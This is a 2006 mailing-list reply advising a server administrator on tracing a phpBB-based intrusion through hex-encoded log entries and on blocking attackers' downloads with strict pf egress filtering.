On Wednesday 04 January 2006 18:25, you wrote: > It's just a bit frustrating. Am I right in thinking if the wget > output is in /var/www/logs/error_log then it comes from a site that > has no defined ErrorLog. This is a limited number of sites, but I've > found no log entries from the transfer logs for those sites that > correspond with the times that wget was run.
It might not appear in the logs that clearly. In particular, the PHPBB attack appears as hex-coded data in the URL, so instead of the word 'wget' you'll see something similar to %7f%3d%5c%34 (no, that's not the actual sequence - in fact, you'll see a really long sequence, and if you decode it you'll note that it includes many commands). I'd wager other attacks are similar. Look carefully through the logs of any site that runs well-known scripts like PHPBB. Then LART the user for not keeping up with the security updates for PHPBB. And I'll reiterate it because it's so important: employ strict egress filtering with 'pf' on your web server so even if someone breaks in, they cannot download scripts to your server with wget or similar (and no, chmod 700 wget or removing wget is not a substitute - in the case of script injection, it is quite possible for an attacker to inject a small Perl or PHP script to connect to a remote host and download things). Your web server simply should not be able to make connections to remote hosts that you don't know about.
